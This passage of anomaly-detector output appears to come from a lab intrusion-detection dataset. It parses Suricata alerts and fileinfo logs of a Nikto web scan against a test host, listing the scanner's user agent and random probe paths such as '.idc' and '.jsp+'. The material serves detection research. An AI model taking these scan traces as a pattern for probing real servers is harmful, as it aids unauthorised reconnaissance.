"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.351261 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46946 -> 192.168.10.154:80", "/parser/model/time": 1583349514.351261, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46946, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.351261 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46946 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.idc", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.351522+0000\",\"flow_id\":455618704595240,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.351522, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":455618704595240,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.idc\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.idc\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.idc", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.idc", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46946, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":455618704595240,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 455618704595240, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.351522+0000\",\"flow_id\":455618704595240,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.353104 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46948 -> 192.168.10.154:80", "/parser/model/time": 1583349514.353104, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46948, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.353104 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46948 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.access", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.353275+0000\",\"flow_id\":1306962827043002,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.access\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.access\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.353275, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1306962827043002,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.access\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.access\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", 
"/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.access\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.access\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.access\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.access\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.access", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", 
"/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.access", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": 
"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46948, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1306962827043002,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1306962827043002, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.353275+0000\",\"flow_id\":1306962827043002,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.access\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.access\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], 
"Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.355207 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46950 -> 192.168.10.154:80", "/parser/model/time": 1583349514.355207, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46950, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.355207 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46950 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.jsp+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.355425+0000\",\"flow_id\":1369948522440834,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.355425, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1369948522440834,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.jsp+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.jsp+\",", 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.jsp+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.jsp+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": 
"\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46950, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", 